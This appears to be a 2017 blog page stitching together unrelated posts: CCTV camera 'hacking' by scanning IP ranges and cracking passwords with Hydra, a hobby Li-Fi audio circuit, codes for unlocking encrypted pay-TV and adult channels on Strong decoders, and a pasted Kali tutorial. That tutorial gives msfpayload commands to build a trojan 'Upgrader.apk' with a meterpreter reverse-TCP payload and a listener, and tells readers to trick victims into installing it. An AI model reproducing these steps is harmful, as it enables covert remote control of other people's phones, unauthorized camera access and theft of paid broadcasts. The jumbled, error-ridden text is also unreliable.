Sunday 29 January 2017

HOW TO A CCTV CAMERA USING ANDROID DEVICE




You can follow these steps:
  • First, download & install the Angry IP scanner, which is dominant GUI port scanner, it is accessible for entire foremost Operating system.
  • Then select IP address range forCCTV camera hacking. These cameras are linked with broadband Internet connection/link.
  • Configure Angry IP for hacking, open Angry IP scanner-go to tools->preference->ports. Web detect is require that can display little facts about devices linked to Internet: CCTV camera form name, router form name.
  • Insert the web detects: go to tools->fetchers->add (<<) web detect, click OK.
  • Then begin the IP range scanning & then copy the IP address & paste it in browser.
  • Mainly CCTV cameras & router organized default username & password.
  • Crack the CCTV camera password by utilizing Hydra.



Vitaly Mikhalyuk
Vitaly Mikhalyuk, https://play.google.com/store/apps/details?id=com.vinternete.livecams






Gourav Kumar
Gourav Kumar, worked at Studying




You can use Command prompt to Hack CCTV.
1)First, release cmd.
2)Then type ipconfig & press enter.
3)You could allocate private IP on your possess by:
4)Double-click on network link icon in the taskbar,
5)Then click on properties,-> Internet protocol,
6)Then mark on ‘use this configuration’,
7)Provide or give your information,
8)Then click on ‘OK’.
You can utilize several commands to hack the CCTV camera by utilizing CMD.

How to make simple a LI-FI (Light Fidelity) Circuit

LI-FI is buzzing around the Internet since past few years; recently LI-FI is gained more popularity around the internet and developers. LI-FI stands for Light Fidelity which was coined by Harald Hassince


The objective of LI-FI is transfer data through visible light. Since the bandwidth of visible light is 10,000 times more than Radio waves, more data can be transferred through light at short period of time.

Visible light communication (VLC) eliminates the risk of some disease caused by the Radio waves due to long period exposure. This protocol can be adapted where Radio waves are restricted, such as airplanes, hospitals, and in some research facilities. Researchers reached bit rate of 224 GB/s which is 100s of times faster than our average WI-FI connection at home or office. 

This article explains about the basic idea how to make a very simple LI-FI circuit in which we will be able to transfer any audio source through light and receive it from the receiver which is placed few feet from the Transmitter. Here explained about analogue communication through light, where as original LI-FI system uses digital communication, which is more complex and difficult to make one at hobby lab. But the concept is exactly the same.







Here is a simple block diagram explaining LI-FI:




The circuit: 

The circuit consists of two parts, which are receiver and transmitter. The transmitter consists of 3 transistors and few passive components paired with 1 watt LED. Which will changes its brightness with respect to audio signal. But changes in brightness due to audio signal will not visible to human eye. We only see static illumination of white LED. The receiver consists of a photo detector (here I used solar cell) which is paired with an amplifier. The sound output is given by the speaker. 


The transmitter is transistorized amplifier which consists of 3 amplifiers connected in parallel to drive the 1 watt white LED. Each transistor base consists of voltage divider which gives necessary bias for the individual transistor. The input stage has capacitors at each transistor’s base for blocking DC signals which could degrade the quality of output.





You can use a current limiting resistor series with LED if you want operate the circuit at higher voltage (say 12V).You can also use standard 0.5mm white LED with current limiting resistor. For an audio source you can use mp3 player, mobile phone or a microphone with pre-amplifier etc. 


The receiver consists of a 6 volt solar cell (3 volts above works fine) in series with 2.2uf capacitor which is paired with an amplifier. The amplifier need not to be the same illustrated here, but you can use any amplifier lying around your house. But make sure it as good sensitivity. 







Here is author’s prototype 



You can use any amplifier with good sensitivity for receiver part. To test this circuit, go to a room where ambient light is dim and make sure no nearby electrical light source.
Place the 1 Watt LED parallel to solar cell. Turn ON the power supply for both transmitter and receiver, give audio input to transmitter, adjust the volume to transmitter. You can here clear audio sound on the receiving speaker. 



The above explained Li-Fi circuit can also be tried using a photodiode as shown below, where the amplifier section is replaced with a LM386 amplifier circuit:

How to Watch DSTV Channels on Strong Decoder via Powervu

As result of revolving nature of technology, life wealth living in the home of technology . In fact it is very easy now a days to watch dstv channels which are meant for riches on your strong decoder There is a powervu software that  will enable you input a valid powervu key into your strong  SRT4920_4922_4922A_decoders..Code named 190p.stb. With this software you can watch powervu channels and powervu channels also shows dstv channels
If your strong 4922 with a valid powervu key is not opening 
the desired powervu channels then you need to install this software and re-enter your powervu keys.
==>An original strong 4920, 4922 or 4922A decoder
==>A usb flash drive
==>Download the software 
==>Install the software into your origional strong decoder. You need a working powervu keys to be entered manually. those who uses strong to watch powervu channels know how to get this keys. If you do not know how to get the keys, then please buy a decoder with auto roll function instead.  
                         Or better still
==>You scan your channels and press 8282 on your strong remote control.
 ==>Scroll down until you see powervu
==>Press ok button
==>Enter your powervu ecm keys 
==>Press ok>>save and exit
==>Restart your decoder and you are done.
             REQUIREMENTS!!   
REGIONAL STRONG DECODER AND CONSTANT ELECTRICITY SUPPLY



Secret Codes to Watch Special Adult Channels on Strong Decoders-How

In fact there are thousand of thousands channels on strong decoders which have been encrypted dollar $ symbol. A common question that has been occurring, my blog readers always ask, how to watch adult (porn), TV3 etc on strong decoder. All these and others channel are there for you watch. I have laid my hand on codes to unencrypted all these channels. While, I shall be specifying some strong decoders which supports these codes, You should not be limited to the list of decoders mentioned here  Tried this codes on any other strong decoder in your possession.
There is no harm in trying .Be warned, don’t edit just anything, else you may damage your decoder.
        SUPPORTING  STRONG DECODERS SRT4920, SRT4922 & SRT4922A
                                             Special functions
==>To Open Patch : dial 6969 (twice)
==>Open BISS keys: Edit menu: dial 8280 (safe to use, but be careful)
==>Open Key code edit menu: dial 8282 (avoid this, unless you know what you are doing)
==>Open Server edit menu: dial 8281 (avoid this, unless you know what you are doing)

                                       HOW TO OPEN HARDCORE CHANNEL (PORN)
 ==>Press MENU
==> Go to Entertainment
=> Dial 9696
                            To Open IPTV List,
==>Press OK to call channel list (“All” has to be selected)







==> Finally press F4.
                              To open Adult IPTV channels
 ==> Go IPTV List  and press OK
==> Press F4 (to call IPTV List) 
==>Finally press 9696
                                     SRT4950, SRT4950H & SRT4950M
==>Open patch: F1+6969  (avoid this, unless you know what you are doing)
==>Open Server Setting Menu: F1+8281  (avoid this, unless you know what you are doing)
==>Open Key Setting Menu: F1+8280
==>Finally,Press “WWW” key on the Remote,
==>Press F1+9999 and “You Porn” icon will pop up.
HEY ENJOY THIS ARTICLE? ! Subscribe to my Blog Feed in a feed reader or sign up for Free Email Updates and you'll never miss a single post. Thanks for reading my Post!

Saturday 28 January 2017

I found How to Hack Android Using Kali (Remotely) and thought that it might help you. I pasted it in for you to use just to make it easier for you.
How to Hack Android Using Kali (Remotely)
Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
Step 1: Fire-Up Kali:
  • Open a terminal, and make aTrojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android onWAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2: Open Another Terminal:
  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...
Step 5: BOOM!
There comes the meterpreter prompt:
Thanks,
-Brody
OTHER ANSWERS

Syed Ammar Ali Shah
Syed Ammar Ali Shah, i use it.. Since it's inception back from 2007
through exploit attack from fake site